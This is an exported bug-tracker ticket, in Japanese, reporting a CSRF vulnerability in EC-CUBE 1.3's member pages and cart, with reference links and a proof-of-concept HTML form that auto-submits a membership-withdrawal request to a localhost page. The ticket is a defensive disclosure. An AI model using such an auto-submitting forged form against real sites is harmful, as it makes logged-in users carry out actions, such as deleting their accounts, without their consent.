id	summary	reporter	owner	description	type	status	priority	milestone	component	version	resolution	keywords	cc	modified_flg
125	CSRF脆弱性	adati	adachi	"ログイン済みの状態で下記のHTMLを開くと、退会が出来てしまう。[[BR]][[BR]]
CSRF脆弱性があるページ→mypage全般、買い物かご[[BR]][[BR]]

CSRF脆弱性についての参考リンク：

・クロスサイトリクエストフォージェリ（CSRF）の正しい対策方法[[BR]]
http://takagi-hiromitsu.jp/diary/20050427.html [[BR]]
・「ぼくはまちちゃん」 ――知られざるCSRF攻撃[[BR]]
http://www.atmarkit.co.jp/fsecurity/column/ueno/33.html [[BR]][[BR]]

----------------------------------------------------------
CSRFを実行するHTMLの例 [[BR]][[BR]]
<html>[[BR]]
<body>[[BR]]
<form name=""form1"" id=""form1"" method=""post"" action=""http://localhost/rel/mypage/refusal.php"">[[BR]]
<input type=""hidden"" name=""mode"" value=""complete"">[[BR]]
<script>document.form1.submit();</script>[[BR]]
</form>[[BR]]
</body>[[BR]]
</html>[[BR]]
----------------------------------------------------------
"	バグ指摘	closed	中	EC-CUBE	フロント	1.3系	無効